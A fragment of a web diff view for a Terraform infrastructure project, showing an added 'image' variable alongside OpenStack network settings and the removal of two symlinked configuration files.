for_each = local.nodes
network_id = openstack_networking_network_v2._.id

View File

@@ -31,6 +31,10 @@ variable "external_network_id" {
type = string
}
variable "image" {
type = string
}
variable "node_sizes" {
type = map(any)
default = {}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/proxmox/config.tf

Some files were not shown because too many files have changed in this diff.